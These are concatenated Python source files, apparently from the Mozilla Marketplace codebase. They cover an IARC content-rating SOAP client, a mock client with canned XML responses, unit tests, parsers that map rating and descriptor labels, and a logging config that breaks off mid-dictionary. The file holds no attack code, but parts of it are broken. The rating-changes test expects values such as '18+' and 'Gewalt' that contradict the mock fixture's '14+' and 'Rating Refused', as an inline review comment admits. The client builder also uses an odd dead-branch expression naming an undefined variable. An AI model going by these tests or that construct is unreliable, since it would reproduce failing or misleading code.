        # Key into the module-level `wsdl` dict; the suds client itself is
        # created lazily on the first call.
        self.wsdl_name = wsdl_name
        self.client = None

    def __getattr__(self, attr):
        # Only expose the whitelisted service methods; anything else raises
        # AttributeError so typos fail loudly.
        for name, methods in [('services', services)]:
            if attr in methods:
                return functools.partial(self.call, attr, wsdl=name)
        raise AttributeError('Unknown request: %s' % attr)

    def call(self, name, wsdl='services', **data):
        """Invoke SOAP method *name* on the *wsdl* service.

        Remaining keyword arguments are the SOAP parameters; unicode values
        are UTF-8 encoded, then everything is base64 encoded as IARC
        requires. The response is returned base64 decoded.

        Bug fix: `wsdl` is now an explicit parameter. Previously the
        `wsdl=name` keyword injected by `__getattr__` fell into **data, got
        base64 encoded and was sent to IARC as a bogus SOAP parameter, and
        the log line printed the module-level `wsdl` dict instead of the
        service name.
        """
        log.info('IARC client call: {0} from wsdl: {1}'.format(name, wsdl))

        if self.client is None:
            self.client = sudsclient.Client(wsdl_map[self.wsdl_name]
                                            if False else
                                            globals()['wsdl'][self.wsdl_name],
                                            cache=None)

        # IARC requires messages be base64 encoded and base64 requires
        # byte-strings.
        for k, v in data.items():
            if isinstance(v, unicode):
                # Encode it as a byte-string.
                v = v.encode('utf-8')
            data[k] = base64.b64encode(v)

        with statsd.timer('mkt.iarc.request.%s' % name.lower()):
            response = getattr(self.client.service, name)(**data)

        return base64.b64decode(response)
class MockClient(Client):
    """
    Mocked IARC SOAP client returning canned XML responses.
    """
    def call(self, name, **data):
        # Built lazily so the MOCK_* constants (defined later in this
        # module) are resolved at call time; unknown methods yield ''.
        canned = {
            'Get_App_Info': MOCK_GET_APP_INFO,
            'Set_Storefront_Data': MOCK_SET_STOREFRONT_DATA,
            'Get_Rating_Changes': MOCK_GET_RATING_CHANGES,
        }
        return canned.get(name, '')
def get_iarc_client(wsdl):
    """
    Use this to get the right client and communicate with IARC.
    """
    klass = MockClient if settings.IARC_MOCK else Client
    return klass(wsdl)
# Canned Get_App_Info response: one ROW describing a single app with one
# rating/descriptor pair per ratings body.
MOCK_GET_APP_INFO = '''<?xml version="1.0" encoding="utf-16"?>
<WEBSERVICE xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" SERVICE_NAME="GET_APP_INFO" TYPE="RESPONSE">
<ROW>
<FIELD NAME="rowId" TYPE="int" VALUE="1" />
<FIELD NAME="submission_id" TYPE="string" VALUE="52" />
<FIELD NAME="title" TYPE="string" VALUE="Twitter" />
<FIELD NAME="company" TYPE="string" VALUE="Mozilla" />
<FIELD NAME="platform" TYPE="string" VALUE="Firefox" />
<FIELD NAME="rating_PEGI" TYPE="string" VALUE="16+" />
<FIELD NAME="descriptors_PEGI" TYPE="string" VALUE="Language, Online" />
<FIELD NAME="rating_USK" TYPE="string" VALUE="Rating Refused" />
<FIELD NAME="descriptors_USK" TYPE="string" VALUE="Explizite Sprache" />
<FIELD NAME="rating_ESRB" TYPE="string" VALUE="Mature 17+" />
<FIELD NAME="descriptors_ESRB" TYPE="string" VALUE="Strong Language" />
<FIELD NAME="rating_CLASSIND" TYPE="string" VALUE="14+" />
<FIELD NAME="descriptors_CLASSIND" TYPE="string" VALUE="Cont\xc3\xa9udo Sexual, Linguagem Impr\xc3\xb3pria" />
<FIELD NAME="rating_Generic" TYPE="string" VALUE="16+" />
<FIELD NAME="descriptors_Generic" TYPE="string" VALUE="" />
<FIELD NAME="storefront" TYPE="string" VALUE="Mozilla" />
<FIELD NAME="interactive_elements" TYPE="string" VALUE="Shares Info, Shares Location, Digital Purchases, Users Interact, " />
</ROW>
</WEBSERVICE>
'''

# Canned Set_Storefront_Data acknowledgement.
MOCK_SET_STOREFRONT_DATA = '''<?xml version="1.0" encoding="utf-16"?>
<WEBSERVICE xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" SERVICE_NAME="SET_STOREFRONT_DATA" TYPE="RESPONSE">
<ROW>
<FIELD NAME="action_status" TYPE="string" VALUE="OK - Storefront data Updated" />
<FIELD NAME="submission_id" TYPE="string" VALUE="52" />
<FIELD NAME="security_code" TYPE="string" VALUE="FZ32CU8" />
<FIELD NAME="title" TYPE="string" VALUE="Twitter" />
<FIELD NAME="company" TYPE="string" VALUE="Mozilla" />
<FIELD NAME="rating" TYPE="string" VALUE="16+" />
<FIELD NAME="descriptors" TYPE="string" VALUE="Language, Online" />
<FIELD NAME="interactive_elements" TYPE="string" VALUE="Shares Info, Shares Location, Digital Purchases, Users Interact, " />
</ROW>
</WEBSERVICE>
'''

# Canned Get_Rating_Changes response with two changed submissions.
MOCK_GET_RATING_CHANGES = '''<?xml version="1.0" encoding="utf-16"?>
<WEBSERVICE xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" SERVICE_NAME="GET_RATING_CHANGES" TYPE="RESPONSE">
<ROW>
<FIELD NAME="rowId" TYPE="int" VALUE="1" />
<FIELD NAME="change_date" TYPE="string" VALUE="11/12/2013" />
<FIELD NAME="submission_id" TYPE="string" VALUE="52" />
<FIELD NAME="security_code" TYPE="string" VALUE="FZ32CU8" />
<FIELD NAME="title" TYPE="string" VALUE="Twitter" />
<FIELD NAME="company" TYPE="string" VALUE="Mozilla" />
<FIELD NAME="email" TYPE="string" VALUE="[email protected]" />
<FIELD NAME="new_rating" TYPE="string" VALUE="14+" />
<FIELD NAME="new_descriptors" TYPE="string" VALUE="Cont\xc3\xa9udo Sexual, Linguagem Impr\xc3\xb3pria" />
<FIELD NAME="rating_system" TYPE="string" VALUE="CLASSIND" />
<FIELD NAME="change_reason" TYPE="string" VALUE="Significant issues found in special mission cut scenes." />
</ROW>
<ROW>
<FIELD NAME="rowId" TYPE="int" VALUE="2" />
<FIELD NAME="change_date" TYPE="string" VALUE="11/12/2013" />
<FIELD NAME="submission_id" TYPE="string" VALUE="68" />
<FIELD NAME="security_code" TYPE="string" VALUE="GZ32CU8" />
<FIELD NAME="title" TYPE="string" VALUE="Other App" />
<FIELD NAME="company" TYPE="string" VALUE="Mozilla" />
<FIELD NAME="email" TYPE="string" VALUE="[email protected]" />
<FIELD NAME="new_rating" TYPE="string" VALUE="Rating Refused" />
<FIELD NAME="new_descriptors" TYPE="string" VALUE="Explizite Sprache" />
<FIELD NAME="rating_system" TYPE="string" VALUE="USK" />
<FIELD NAME="change_reason" TYPE="string" VALUE="Discrimination found to be within German law." />
</ROW>
</WEBSERVICE>
'''
########NEW FILE########
__FILENAME__ = test_client
import test_utils
from ..client import Client, MockClient, get_iarc_client
class TestClient(test_utils.TestCase):
    """Exercise MockClient's canned responses and the method whitelist."""

    def setUp(self):
        self.client = MockClient('services')

    def test_bad_call(self):
        # Methods outside the `services` whitelist raise AttributeError.
        with self.assertRaises(AttributeError):
            self.client.Get_Something_Nonexistent()

    def test_get_app_info(self):
        xml = self.client.Get_App_Info(XMLString='Proper XML here')
        assert xml.startswith('<?xml version="1.0" encoding="utf-16"?>')
        assert ' SERVICE_NAME="GET_APP_INFO"' in xml

    def test_set_storefront_data(self):
        xml = self.client.Set_Storefront_Data(XMLString='Proper XML here')
        assert xml.startswith('<?xml version="1.0" encoding="utf-16"?>')
        assert ' SERVICE_NAME="SET_STOREFRONT_DATA"' in xml

    def test_rating_changes(self):
        xml = self.client.Get_Rating_Changes(XMLString='Proper XML here')
        assert xml.startswith('<?xml version="1.0" encoding="utf-16"?>')
        assert ' SERVICE_NAME="GET_RATING_CHANGES"' in xml
class TestRightClient(test_utils.TestCase):
    """get_iarc_client must honour the IARC_MOCK setting."""

    def test_no_mock(self):
        with self.settings(IARC_MOCK=False):
            assert isinstance(get_iarc_client('services'), Client)

    def test_mock(self):
        with self.settings(IARC_MOCK=True):
            assert isinstance(get_iarc_client('services'), MockClient)
########NEW FILE########
__FILENAME__ = test_utils_
# -*- coding: utf-8 -*-
import base64
import datetime
from django.test.utils import override_settings
from nose.tools import eq_
import amo.tests
from lib.iarc.client import get_iarc_client
from lib.iarc.utils import IARC_XML_Parser, render_xml
from mkt.constants import ratingsbodies
class TestRenderAppInfo(amo.tests.TestCase):
    """Rendering of the get_app_info.xml request template."""

    def setUp(self):
        self.template = 'get_app_info.xml'

    @override_settings(IARC_PASSWORD='s3kr3t')
    def test_render(self):
        xml = render_xml(self.template, {'submission_id': 100,
                                         'security_code': 'AB12CD3'})
        assert xml.startswith('<?xml version="1.0" encoding="utf-8"?>')
        assert '<FIELD NAME="password" VALUE="s3kr3t"' in xml
        assert '<FIELD NAME="submission_id" VALUE="100"' in xml
        assert '<FIELD NAME="security_code" VALUE="AB12CD3"' in xml
        assert '<FIELD NAME="platform" VALUE="Firefox"' in xml
        # If these aren't specified in the context they aren't included.
        assert not '<FIELD NAME="title"' in xml
class TestRenderSetStorefrontData(amo.tests.TestCase):
    """Rendering of the set_storefront_data.xml request template."""

    def setUp(self):
        self.template = 'set_storefront_data.xml'

    @override_settings(IARC_PASSWORD='s3kr3t',
                       IARC_PLATFORM='Firefox')
    def test_render(self):
        xml = render_xml(self.template, {
            'submission_id': 100,
            'security_code': 'AB12CD3',
            'rating_system': 'PEGI',
            'release_date': datetime.date(2013, 11, 1),
            'title': 'Twitter',
            'company': 'Test User',
            'rating': '16+',
            'descriptors': u'N\xc3\xa3o h\xc3\xa1 inadequa\xc3\xa7\xc3\xb5es',
            'interactive_elements': 'users interact'})
        assert xml.startswith('<?xml version="1.0" encoding="utf-8"?>')
        assert '<FIELD NAME="password" VALUE="s3kr3t"' in xml
        assert '<FIELD NAME="storefront_company" VALUE="Test User"' in xml
        assert '<FIELD NAME="platform" VALUE="Firefox"' in xml
        assert '<FIELD NAME="submission_id" VALUE="100"' in xml
        assert '<FIELD NAME="security_code" VALUE="AB12CD3"' in xml
        assert '<FIELD NAME="rating_system" VALUE="PEGI"' in xml
        assert '<FIELD NAME="release_date" VALUE="2013-11-01"' in xml
        assert '<FIELD NAME="storefront_title" VALUE="Twitter"' in xml
        assert '<FIELD NAME="storefront_rating" VALUE="16+"' in xml
        assert ('<FIELD NAME="storefront_descriptors" '
                u'VALUE="N\xc3\xa3o h\xc3\xa1 inadequa\xc3\xa7\xc3\xb5es"'
                in xml)
        assert ('<FIELD NAME="storefront_interactive_elements" '
                'VALUE="users interact"') in xml

        # The client base64 encodes these. Mimic what the client does here to
        # ensure no unicode problems.
        base64.b64encode(xml.encode('utf-8'))
class TestRenderRatingChanges(amo.tests.TestCase):
    """Rendering of the get_rating_changes.xml request template."""

    def setUp(self):
        self.template = 'get_rating_changes.xml'

    @override_settings(IARC_PASSWORD='s3kr3t')
    def test_render(self):
        xml = render_xml(self.template, {
            'date_from': datetime.date(2011, 1, 1),
            'date_to': datetime.date(2011, 2, 1)})
        assert xml.startswith('<?xml version="1.0" encoding="utf-8"?>')
        assert '<FIELD NAME="password" VALUE="s3kr3t"' in xml
        assert '<FIELD NAME="date_from" VALUE="2011-01-01"' in xml
        assert '<FIELD NAME="date_to" VALUE="2011-02-01"' in xml
class TestXMLParser(amo.tests.TestCase):
    """IARC_XML_Parser behaviour against the mocked client responses."""

    def setUp(self):
        # NOTE(review): 'service' (singular) differs from the 'services'
        # wsdl key used elsewhere; the mock client ignores the name, but
        # confirm this is intentional.
        self.client = get_iarc_client('service')

    def test_missing_value(self):
        """Sometimes the VALUE attribute in the XML is missing."""
        xml = '''<?xml version="1.0" encoding="utf-16"?>
<WEBSERVICE SERVICE_NAME="SET_STOREFRONT_DATA" TYPE="REQUEST">
<ROW>
<FIELD NAME="rating_PEGI" TYPE="string" VALUE="16+" />
<FIELD NAME="descriptors_PEGI" TYPE="string" />
</ROW>
</WEBSERVICE>'''
        data = IARC_XML_Parser().parse_string(xml)
        assert 'ratings' in data['rows'][0]
        assert 'descriptors' not in data['rows'][0]

    def test_app_info(self):
        xml = self.client.Get_App_Info(XMLString='foo')
        data = IARC_XML_Parser().parse_string(xml)['rows'][0]

        eq_(data['submission_id'], 52)
        eq_(data['title'], 'Twitter')
        eq_(data['company'], 'Mozilla')
        eq_(data['storefront'], 'Mozilla')
        eq_(data['platform'], 'Firefox')

        # Test ratings get mapped to their appropriate rating classes.
        eq_(data['ratings'][ratingsbodies.ESRB], ratingsbodies.ESRB_M)
        eq_(data['ratings'][ratingsbodies.USK], ratingsbodies.USK_REJECTED)
        eq_(data['ratings'][ratingsbodies.CLASSIND], ratingsbodies.CLASSIND_14)
        eq_(data['ratings'][ratingsbodies.PEGI], ratingsbodies.PEGI_16)
        eq_(data['ratings'][ratingsbodies.GENERIC], ratingsbodies.GENERIC_16)

        # Test descriptors.
        self.assertSetEqual(data['descriptors'],
                            ['has_usk_lang',
                             'has_esrb_strong_lang',
                             'has_classind_sex_content', 'has_classind_lang',
                             'has_pegi_lang', 'has_pegi_online'])

        # Test interactives.
        self.assertSetEqual(data['interactives'],
                            ['has_shares_info', 'has_shares_location',
                             'has_digital_purchases', 'has_users_interact'])

    def test_rating_changes(self):
        # NOTE(review): several expected values below (new_rating,
        # new_descriptors) do not match the MOCK_GET_RATING_CHANGES fixture
        # in lib/iarc/client.py -- verify fixture and test are in sync.
        xml = self.client.Get_Rating_Changes(XMLString='foo')
        data = IARC_XML_Parser().parse_string(xml)

        eq_(len(data['rows']), 2)

        row = data['rows'][0]
        eq_(row['rowId'], 1)
        eq_(row['submission_id'], 52)
        eq_(row['title'], 'Twitter')
        eq_(row['company'], 'Mozilla')
        eq_(row['change_date'], '11/12/2013')
        eq_(row['security_code'], 'FZ32CU8')
        eq_(row['email'], '[email protected]')
        eq_(row['rating_system'], ratingsbodies.CLASSIND)
        eq_(row['new_rating'], '18+')
        eq_(row['new_descriptors'],
            u'Conte\xfado Impactante, Cont\xe9udo Sexual, Drogas, Linguagem '
            u'Impr\xf3pria, Nudez, Viol\xeancia Extrema')
        eq_(row['change_reason'],
            'Significant issues found in special mission cut scenes.')

        row = data['rows'][1]
        eq_(row['rowId'], 2)
        eq_(row['submission_id'], 68)
        eq_(row['title'], 'Other App')
        eq_(row['company'], 'Mozilla')
        eq_(row['change_date'], '11/12/2013')
        eq_(row['security_code'], 'GZ32CU8')
        eq_(row['email'], '[email protected]')
        eq_(row['new_rating'], '12+')
        eq_(row['new_descriptors'], 'Gewalt')
        eq_(row['rating_system'], ratingsbodies.USK)
        eq_(row['change_reason'],
            'Discrimination found to be within German law.')
########NEW FILE########
__FILENAME__ = utils
import os
import StringIO
from django.conf import settings
from jinja2 import Environment, FileSystemLoader
from rest_framework.compat import etree, six
from rest_framework.exceptions import ParseError
from rest_framework.parsers import JSONParser, XMLParser
import amo.utils
from amo.helpers import strip_controls
from mkt.constants import ratingsbodies
# Jinja environment loading the IARC request templates from lib/iarc/templates.
root = os.path.join(settings.ROOT, 'lib', 'iarc')
env = Environment(loader=FileSystemLoader(os.path.join(root, 'templates')))
# Run every rendered value through strip_controls (see render_xml docstring).
env.finalize = lambda x: strip_controls(x)
def render_xml(template, context):
    """
    Renders an XML template given a dict of the context.

    This also strips control characters before encoding.

    `template` is a template filename under lib/iarc/templates; `context`
    is left untouched (a copy is taken before the password/platform are
    injected).
    """
    # Work on a copy so we don't mutate the caller's dict (the original
    # version injected keys into the caller's context as a side effect).
    context = dict(context)

    # All XML passed requires a password. Let's add it to the context.
    context['password'] = settings.IARC_PASSWORD
    context['platform'] = settings.IARC_PLATFORM

    template = env.get_template(template)
    return template.render(context)
def get_iarc_app_title(app):
    """Delocalized app name (rendered in the app's default locale)."""
    from mkt.webapps.models import Webapp
    with amo.utils.no_translation(app.default_locale):
        raw_app = Webapp.with_deleted.get(pk=app.pk)
    return unicode(raw_app.name)
class IARC_Parser(object):
    """
    Base class for IARC XML and JSON parsers.
    """

    def _process_iarc_items(self, data):
        """
        Looks for IARC keys ('interactive_elements' or keys starting with
        'rating_' or 'descriptors_') and trades them for a 'ratings' dictionary
        or descriptor and interactive lists.

        Returns a list of dicts, one per input row.
        """
        rows = []  # New data object we'll return.

        for row in data:
            d = {}
            ratings = {}
            descriptors = []
            interactives = []

            for k, v in row.items():
                # Get ratings body constant from the key suffix, e.g.
                # 'rating_PEGI' -> PEGI; unknown suffixes fall back to
                # GENERIC.
                ratings_body = RATINGS_BODY_MAPPING.get(
                    k.split('_')[-1].lower(), ratingsbodies.GENERIC)

                if k == 'rating_system':
                    # This key is used in the Get_Rating_Changes API.
                    d[k] = RATINGS_BODY_MAPPING.get(v.lower(),
                                                    ratingsbodies.GENERIC)
                elif k == 'interactive_elements':
                    # Comma-separated list; blanks are dropped.
                    interactives = [INTERACTIVES_MAPPING[s] for s in
                                    filter(None, [s.strip()
                                                  for s in v.split(',')])]
                elif k.startswith('rating_'):
                    # Map the label to a rating class, using the body's
                    # 'default' entry for unrecognized labels.
                    ratings[ratings_body] = RATINGS_MAPPING[ratings_body].get(
                        v, RATINGS_MAPPING[ratings_body]['default'])
                elif k.startswith('descriptors_'):
                    native_descs = filter(None,
                                          [s.strip() for s in v.split(',')])
                    # Unknown descriptors are silently dropped.
                    descriptors.extend(
                        filter(None, [DESC_MAPPING[ratings_body].get(desc)
                                      for desc in native_descs]))
                else:
                    # Non-IARC-specific fields pass through untouched.
                    d[k] = v

            if ratings:
                d['ratings'] = ratings
            if descriptors:
                d['descriptors'] = descriptors
            if interactives:
                d['interactives'] = interactives

            rows.append(d)

        return rows
class IARC_XML_Parser(XMLParser, IARC_Parser):
    """
    Custom XML processor for IARC whack XML that defines all content in XML
    attributes with no tag content and all tags are named the same. This builds
    a dict using the "NAME" and "VALUE" attributes.
    """

    # TODO: Remove this `parse` method once this PR is merged and released:
    # https://github.com/tomchristie/django-rest-framework/pull/1211
    def parse(self, stream, media_type=None, parser_context=None):
        """
        Parses the incoming bytestream as XML and returns the resulting data.
        """
        assert etree, 'XMLParser requires defusedxml to be installed'

        parser_context = parser_context or {}
        encoding = parser_context.get('encoding', settings.DEFAULT_CHARSET)
        parser = etree.DefusedXMLParser(encoding=encoding)
        try:
            tree = etree.parse(stream, parser=parser, forbid_dtd=True)
        except (etree.ParseError, ValueError) as exc:
            raise ParseError('XML parse error - %s' % six.text_type(exc))
        data = self._xml_convert(tree.getroot())

        # Process ratings, descriptors, interactives.
        data = self._process_iarc_items(data)

        # If it's a list, it had one or more "ROW" tags.
        if isinstance(data, list):
            data = {'rows': data}

        return data

    def parse_string(self, string):
        """Parse an XML string (rather than a stream) into a dict."""
        # WARNING: Ugly hack.
        #
        # IARC XML is utf-8 encoded yet the XML has a utf-16 header. Python
        # correctly reports the encoding mismatch and raises an error. So we
        # replace it here to make things work.
        string = string.replace('encoding="utf-16"', 'encoding="utf-8"')
        return self.parse(StringIO.StringIO(string))

    def _xml_convert(self, element):
        """
        Convert the xml `element` into the corresponding Python object.
        """
        children = list(element)
        if len(children) == 0:
            # Leaf: the payload lives in the VALUE attribute (may be absent).
            return self._type_convert(element.get('VALUE', ''))
        else:
            if children[0].tag == 'ROW':
                # Multiple ROW children become a list of converted rows.
                data = []
                for child in children:
                    data.append(self._xml_convert(child))
            else:
                # FIELD children keyed by their NAME attribute (tag as
                # fallback).
                data = {}
                for child in children:
                    data[child.get('NAME',
                                   child.tag)] = self._xml_convert(child)

            return data
class IARC_JSON_Parser(JSONParser, IARC_Parser):
    """
    JSON Parser to handle IARC's JSON format.
    """

    def parse(self, stream, media_type=None, parser_context=None):
        raw = super(IARC_JSON_Parser, self).parse(stream, media_type,
                                                  parser_context)
        return self._process_iarc_items(self._convert(raw))

    def _convert(self, data):
        """
        Converts JSON that looks like::

            {
                "NAME": "token",
                "TYPE": "string",
                "VALUE": "AB12CD3"
            }

        Into something more normal that looks like this::

            {
                "token": "AB12CD3"
            }

        """
        fields = data['ROW']['FIELD']
        # Return a list to match the parsed XML.
        return [dict((f['NAME'], f['VALUE']) for f in fields)]
# These mappings are required to convert the IARC response strings, like "ESRB"
# to the ratings body constants in mkt/constants/ratingsbodies. Likewise for
# the descriptors.
# Keys are the lowercased IARC body names; 'default' is the fallback body.
RATINGS_BODY_MAPPING = {
    'classind': ratingsbodies.CLASSIND,
    'esrb': ratingsbodies.ESRB,
    'generic': ratingsbodies.GENERIC,
    'pegi': ratingsbodies.PEGI,
    'usk': ratingsbodies.USK,
    'default': ratingsbodies.GENERIC,
}
# Per-body mapping from the IARC rating label to a rating constant; each
# body's 'default' entry is the fallback for unrecognized labels.
RATINGS_MAPPING = {
    ratingsbodies.CLASSIND: {
        'Livre': ratingsbodies.CLASSIND_L,
        '10+': ratingsbodies.CLASSIND_10,
        '12+': ratingsbodies.CLASSIND_12,
        '14+': ratingsbodies.CLASSIND_14,
        '16+': ratingsbodies.CLASSIND_16,
        '18+': ratingsbodies.CLASSIND_18,
        'default': ratingsbodies.CLASSIND_L,
    },
    ratingsbodies.ESRB: {
        'Everyone': ratingsbodies.ESRB_E,
        'Everyone 10+': ratingsbodies.ESRB_10,
        'Teen': ratingsbodies.ESRB_T,
        'Mature 17+': ratingsbodies.ESRB_M,
        'Adults Only': ratingsbodies.ESRB_A,
        'default': ratingsbodies.ESRB_E,
    },
    ratingsbodies.GENERIC: {
        '3+': ratingsbodies.GENERIC_3,
        '7+': ratingsbodies.GENERIC_7,
        '12+': ratingsbodies.GENERIC_12,
        '16+': ratingsbodies.GENERIC_16,
        '18+': ratingsbodies.GENERIC_18,
        'RP': ratingsbodies.GENERIC_RP,
        'default': ratingsbodies.GENERIC_3,
    },
    ratingsbodies.PEGI: {
        '3+': ratingsbodies.PEGI_3,
        '7+': ratingsbodies.PEGI_7,
        '12+': ratingsbodies.PEGI_12,
        '16+': ratingsbodies.PEGI_16,
        '18+': ratingsbodies.PEGI_18,
        'default': ratingsbodies.PEGI_3,
    },
    ratingsbodies.USK: {
        '0+': ratingsbodies.USK_0,
        '6+': ratingsbodies.USK_6,
        '12+': ratingsbodies.USK_12,
        '16+': ratingsbodies.USK_16,
        '18+': ratingsbodies.USK_18,
        'Rating Refused': ratingsbodies.USK_REJECTED,
        'default': ratingsbodies.USK_0,
    },
}
DESC_MAPPING = {
    # All values will be prepended with 'has_%s_' % RATINGS_BODY later.
    # Keys are the descriptor labels IARC returns, in each body's native
    # language (Portuguese for CLASSIND, German for USK, English otherwise).
    ratingsbodies.CLASSIND: {
        u'Atos Crim\xEDnosos': 'criminal_acts',
        u'Cont\xE9udo Sexual': 'sex_content',
        u'Conte\xFAdo Impactante': 'shocking',
        u'Drogas Il\xEDcitas': 'drugs_illegal',
        u'Drogas L\xEDcitas': 'drugs_legal',
        u'Drogas': 'drugs',
        u'Linguagem Impr\xF3pria': 'lang',
        u'Nudez': 'nudity',
        u'Sexo': 'sex',
        u'Sexo Expl\xEDcito': 'sex_explicit',
        u'Viol\xEAncia Extrema': 'violence_extreme',
        u'Viol\xEAncia': 'violence',
    },
    ratingsbodies.ESRB: {
        u'Alcohol and Tobacco Reference': 'alcohol_tobacco_ref',
        u'Alcohol Reference': 'alcohol_ref',
        u'Blood and Gore': 'blood_gore',
        u'Blood': 'blood',
        u'Comic Mischief': 'comic_mischief',
        u'Crime': 'crime',
        u'Criminal Instruction': 'crime_instruct',
        u'Crude Humor': 'crude_humor',
        u'Drug and Alcohol Reference': 'drug_alcohol_ref',
        u'Drug and Tobacco Reference': 'drug_tobacco_ref',
        u'Drug Reference': 'drug_ref',
        u'Drug, Alcohol and Tobacco Reference': 'drug_alcohol_tobacco_ref',
        u'Fantasy Violence': 'fantasy_violence',
        u'Hate Speech': 'hate_speech',
        u'Intense Violence': 'intense_violence',
        u'Language': 'lang',
        u'Mild Blood': 'mild_blood',
        u'Mild Fantasy Violence': 'mild_fantasy_violence',
        u'Mild Language': 'mild_lang',
        u'Mild Violence': 'mild_violence',
        u'Nudity': 'nudity',
        u'Partial Nudity': 'partial_nudity',
        u'Real Gambling': 'real_gambling',
        u'Scary Themes': 'scary',
        u'Sexual Content': 'sex_content',
        u'Sexual Themes': 'sex_themes',
        u'Simulated Gambling': 'sim_gambling',
        u'Strong Language': 'strong_lang',
        u'Strong Sexual Content': 'strong_sex_content',
        u'Suggestive Themes': 'suggestive',
        u'Tobacco Reference': 'tobacco_ref',
        u'Use of Alcohol and Tobacco': 'alcohol_tobacco_use',
        u'Use of Alcohol': 'alcohol_use',
        u'Use of Drug and Alcohol': 'drug_alcohol_use',
        u'Use of Drug and Tobacco': 'drug_tobacco_use',
        u'Use of Drug, Alcohol and Tobacco': 'drug_alcohol_tobacco_use',
        u'Use of Drugs': 'drug_use',
        u'Use of Tobacco': 'tobacco_use',
        u'Violence': 'violence',
        u'Violent References': 'violence_ref',
    },
    ratingsbodies.GENERIC: {
        u'Discrimination': 'discrimination',
        u'Drugs': 'drugs',
        u'Fear': 'scary',
        u'Gambling': 'gambling',
        u'Language': 'lang',
        u'Online': 'online',
        u'Sex': 'sex_content',
        u'Violence': 'violence',
    },
    ratingsbodies.PEGI: {
        u'Discrimination': 'discrimination',
        u'Drugs': 'drugs',
        u'Fear': 'scary',
        u'Gambling': 'gambling',
        u'Language': 'lang',
        u'Online': 'online',
        u'Sex': 'sex_content',
        u'Violence': 'violence',
        # PEGI's versions of Interactive Elements.
        u'In-app purchase option': 'digital_purchases',
        u'Location data sharing': 'shares_location',
        u'Personal data sharing': 'shares_info',
        u'Social interaction functionality': 'users_interact',
    },
    ratingsbodies.USK: {
        u'Alkoholkonsum': 'alcohol',
        u'Abstrakte Gewalt': 'abstract_violence',
        u'Andeutungen Sexueller Gewalt': 'sex_violence_ref',
        u'\xC4ngstigende Inhalte': 'scary',
        u'Diskriminierung': 'discrimination',
        u'Drogen': 'drugs',
        u'Drogenkonsum': 'drug_use',
        u'Erotik/Sexuelle Inhalte': 'sex_content',
        u'Explizite Sprache': 'lang',
        u'Explizite Gewalt': 'explicit_violence',
        u'Gelegentliches Fluchen': 'some_swearing',
        u'Gewalt': 'violence',
        u'Grusel/Horror': 'horror',
        u'Nacktheit/Erotik': 'nudity',
        u'Seltene Schreckmomente': 'some_scares',
        u'Sexuelle Gewalt': 'sex_violence',
        u'Sexuelle Andeutungen': 'sex_ref',
        u'Tabakkonsum': 'tobacco',
    },
}
# Expand the mapping key names (e.g. 'blood' to 'has_esrb_blood').
# Only values of existing keys are overwritten (no keys added/removed),
# so mutating DESC_MAPPING while iterating it is safe here.
for body, mappings in DESC_MAPPING.items():
    for native_desc, desc_slug in mappings.items():
        DESC_MAPPING[body][native_desc] = 'has_{0}_{1}'.format(
            body.iarc_name, desc_slug).lower()
# Change {body: {'key': 'val'}} to {'val': 'key'}.
REVERSE_DESC_MAPPING_BY_BODY = (
    dict([(unicode(v), unicode(k)) for k, v in body_mapping.iteritems()])
    for body, body_mapping in DESC_MAPPING.iteritems())
# Flatten the per-body reverse maps into a single lookup dict.
# NOTE(review): expanded slugs shared by several bodies would collide here
# (last body iterated wins) — the 'has_<body>_' prefix presumably keeps
# them unique; confirm.
REVERSE_DESC_MAPPING = {}
for mapping in REVERSE_DESC_MAPPING_BY_BODY:
    REVERSE_DESC_MAPPING.update(mapping)
# IARC interactive-element labels -> flag attribute names.
INTERACTIVES_MAPPING = {
    'Users Interact': 'has_users_interact',
    'Shares Info': 'has_shares_info',
    'Shares Location': 'has_shares_location',
    'Digital Purchases': 'has_digital_purchases',
}
# Flag attribute name -> IARC interactive-element label.
REVERSE_INTERACTIVES_MAPPING = dict(
    (v, k) for k, v in INTERACTIVES_MAPPING.iteritems())
########NEW FILE########
__FILENAME__ = log_settings_base
import logging
import logging.handlers
from django.conf import settings
from raven.contrib.django.handlers import SentryHandler
import commonware.log
import dictconfig
# Shared log line layouts; error_fmt additionally records the request path.
base_fmt = ('%(name)s:%(levelname)s %(message)s '
            ':%(pathname)s:%(lineno)s')
error_fmt = ('%(name)s:%(levelname)s %(request_path)s %(message)s '
             ':%(pathname)s:%(lineno)s')
# Formatter configs; the prod/error ones prefix hostname and syslog tag and
# record the username/remote address via commonware's Formatter.
formatters = {
    'debug': {
        '()': commonware.log.Formatter,
        'datefmt': '%H:%M:%S',
        'format': '%(asctime)s ' + base_fmt,
    },
    'prod': {
        '()': commonware.log.Formatter,
        'datefmt': '%H:%M:%S',
        'format': ('%s %s: [%%(USERNAME)s][%%(REMOTE_ADDR)s] %s'
                   % (settings.HOSTNAME, settings.SYSLOG_TAG, base_fmt)),
    },
    'prod2': {
        '()': commonware.log.Formatter,
        'datefmt': '%H:%M:%S',
        'format': ('%s %s: [%%(USERNAME)s][%%(REMOTE_ADDR)s] %s'
                   % (settings.HOSTNAME, settings.SYSLOG_TAG2, base_fmt)),
    },
    'error': {
        '()': commonware.log.Formatter,
        'datefmt': '%H:%M:%S',
        'format': ('%s %s: [%%(USERNAME)s][%%(REMOTE_ADDR)s] %s'
                   % (settings.HOSTNAME, settings.SYSLOG_TAG, error_fmt)),
    },
}
# Handler configs; 'syslog'/'syslog2' differ only in the formatter (and
# therefore the syslog tag) used.
handlers = {
    'console': {
        '()': logging.StreamHandler,
        'formatter': 'debug',
    },
    'syslog': {
        'class': 'mozilla_logger.log.UnicodeHandler',
        'facility': logging.handlers.SysLogHandler.LOG_LOCAL7,
        'formatter': 'prod',
    },
    'syslog2': {
        'class': 'mozilla_logger.log.UnicodeHandler',
        'facility': logging.handlers.SysLogHandler.LOG_LOCAL7,
        'formatter': 'prod2',
    },
    'null': {
        'class': 'lib.misc.admin_log.NullHandler',
    },
    'statsd': {
        'level': 'ERROR',
        'class': 'django_statsd.loggers.errors.StatsdHandler',
    },
}
# Logger configs; loggers without handlers/level get defaults filled in by
# log_configure() below.
loggers = {
    'z': {},
    'django.request': {
        'handlers': ['statsd'],
        'level': 'ERROR',
        'propagate': True,
    },
    'z.celery': {
        'handlers': ['statsd'],
        'level': 'ERROR',
